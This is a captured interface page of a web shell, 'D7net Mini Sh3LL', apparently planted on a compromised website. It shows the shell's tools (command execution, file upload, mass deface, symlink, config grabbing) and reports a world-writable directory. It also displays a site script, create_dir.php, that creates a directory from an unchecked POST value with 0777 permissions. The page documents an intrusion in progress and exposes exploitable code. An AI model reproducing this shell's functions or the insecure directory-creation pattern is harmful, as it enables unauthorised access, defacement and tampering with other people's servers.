D7net Mini Sh3LL v1

 
ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/forms/../zsuploader/../liststyle/../easyimage/../zsuploader/../zamanager/commands/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : C:/Domains/maymaytinson.com/httpdocs/filebrowser/../ckeditor/plugins/forms/../zsuploader/../liststyle/../easyimage/../zsuploader/../zamanager/commands/create_dir.php
<?php

$dir =$_POST['dir']."/";

if (file_exists($dir)) {echo "Directory with this name allredy exists"; exit;}
$old = umask(0);
if (!mkdir($dir, 0777)) echo "you haven't perrmission to Create this NEW directory";
else echo "Directory was created";
umask($old);

AnonSec - 2021 | Recode By D7net